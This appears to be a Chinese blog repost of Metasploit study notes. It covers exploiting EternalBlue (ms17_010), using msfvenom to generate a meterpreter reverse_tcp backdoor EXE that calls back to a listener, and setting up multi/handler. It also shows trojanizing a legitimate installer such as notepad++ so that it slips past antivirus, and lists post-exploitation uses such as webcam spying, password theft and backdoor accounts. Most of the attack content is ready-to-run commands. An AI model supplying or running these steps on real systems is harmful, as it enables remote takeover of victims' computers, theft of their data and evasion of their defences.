首页 > 其他分享 >msf

msf

时间:2023-04-16 16:44:15浏览次数:62  
标签:set windows 192.168 exe msf meterpreter

MSF——基本使用和Exploit模块(一) – 走看看 (zoukankan.com)

1、介绍

matasploit,简称msf,是一款开源安全漏洞利用和测试工具,集成了 各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。

msfconsole

2、永恒之蓝

永恒之蓝 2017年4月4日 黑客团体Brokeers影子经纪人 网络攻击工具
利用windows系统的smb漏洞可以获取系统最高权限
5月12日 出现基于此的wanacry勒索病毒

3、使用模块

有上千个模块,搜索语法

search ms17_010
//exploit 攻击脚本
//auxiliary 辅助脚本,测试漏洞是否存在

use 编号
use 全称

//查看设置
show options或者options
# 设置参数
set RHOSTS 192.168.2.129
# payload option攻击载荷,指的是目标的操作系统,主要是32和64,最新版msf是默认64
# LHOST 监听地址,即运行msf的主机
# LPORT msf使用端口
# set lport 60000

# 攻击
run
# meterpreter标识,标识攻击成功

MSDN, 我告诉你 – 做一个安静的工具站 (itellyou.cn),一个windows的镜像资源站点,其中的操作系统是原生纯净的,没有任何补丁。

4、后门

meterpreter是强大的后渗透模块

help //在meterpreter标识输入,获取帮助信息

远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统

msfvenom是用来生成后门的软件,在目标上执行后门,在本地监听上线。

msfvenom在shell里使用,不是msfconsole终端

病毒分为破坏性的和共存性的

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -o demo.exe
  • -p payload
  • 系统/架构/作用/方式
  • 本地ip和本地端口,是自主设置的
  • -f format
  • 作用之后生成文件

一般会被防火墙过滤,需要免杀

5、

use exploit/multi/handler
//三个必须的设置,需要与生成的木马一致的设置
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.123.136
set lport 9999
run

用户双击exe运行之后,攻击者就会收到。

6、权限维持和二次

7、免杀

捆绑木马:下载正常程序,然后捆绑,当用户收到软件执行后会触发。

(可以绕过火绒,但无法绕过对文件校验的360.且需要注意国内程序默认一般是32,无法植入64位的木马)

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.136 lport=9999 -f exe -x notepadd++.exe -o demo.exe

加壳:本身是保护软件不被反编译,不被抄袭。分为压缩壳、加密壳

通过加壳软件使用,比如themida

标签:set,windows,192.168,exe,msf,meterpreter
From: https://www.cnblogs.com/wd404/p/17323513.html

相关文章

  • msf帮助文档
    1、介绍msf启动后,以交互式窗口命令进行工作。通过help命令查看帮助文档:help2、核心命令3、模块命令4、任务命令5、资源脚本命令6、数据库后端命令7、认证后端命令8、发展命令 ......
  • MSF实战免杀过静态:ShellCode加花指令
    分析MSF的ShellCode1.Hash寻找系统API函数由于ShellCode是没有PE结构的,无法通过导入表来调用系统的API函数,因此,这部分是一个通用的API调用函数,它可以根据给定的哈希值查找并调用相应的API。在查找API时,它会遍历已加载模块的列表以及每个模块的导出地址表。这个函数在Shellcode中......
  • msfconsole入门
    jpg改pdf本文我们简单的来学习,msfconsole在实际的渗透测试中长应用的手段和方法。以及msf在后渗透阶段的使用。注意本文所讲到的技术仅在本地靶场环境运行,同时本文的......
  • MSF练习 - 永恒之蓝
    永恒之蓝漏洞利用一、启动MSFmsfconsole┌──(root㉿kali)-[~]└─#msfconsole                          ......
  • 记一次完整体系的攻防演练的环境部署-映射公网-渗透getshell-上线frp-上线MSF实现内网
    前言,本次笔记是记录在工作中的一个攻防演练环境搭建和通过部署的应用存在的文件上传漏洞getshell,接着上线frp,接着上线msf,实现msf远程渗透。准备工作:1,在客户的内网环境......
  • msfvenom常用payload命令
    windows:msfvenom-ax86--platformWindows-pwindows/meterpreter/reverse_tcpLHOST=攻击机IPLPORT=攻击机端口-ex86/shikata_ga_nai-b'\x00\x0a\xff'-i3-......
  • 利用宏感染 word 文档(基于MSF)
    1.生成我们的VBA代码msfvenom-ax86--platformwindows-pwindows/meterpreter/reverse_tcpLHOST=192.168.59.134LPORT=4444-ex86/shikata_ga_nai-i10-fvb......
  • 利用宏感染Word文档(基于MSF)
    1.生成我们的vba代码msfvenom-ax86--platformwindows-pwindows/meterpreter/reverse_tcpLHOST=IPLPORT=4444-ex86/shikata_ga_nai-i10-fvba-exe执行完成后......
  • 解决MSF meterpreter进入shell乱码问题。
    使用chcp65001可以解决。如下是使用前后对比:C:\Windows\system32>cmdkey/listcmdkey/list▒▒ǰ▒▒▒▒▒ƾ▒▒:*▒▒*C:\Windows\system32>chcp65001ch......
  • MSF-命令集
    1常用命令1.1 CoreCommands1.1.1?---帮助菜单msf6>?CoreCommands=============CommandDescription------------------?......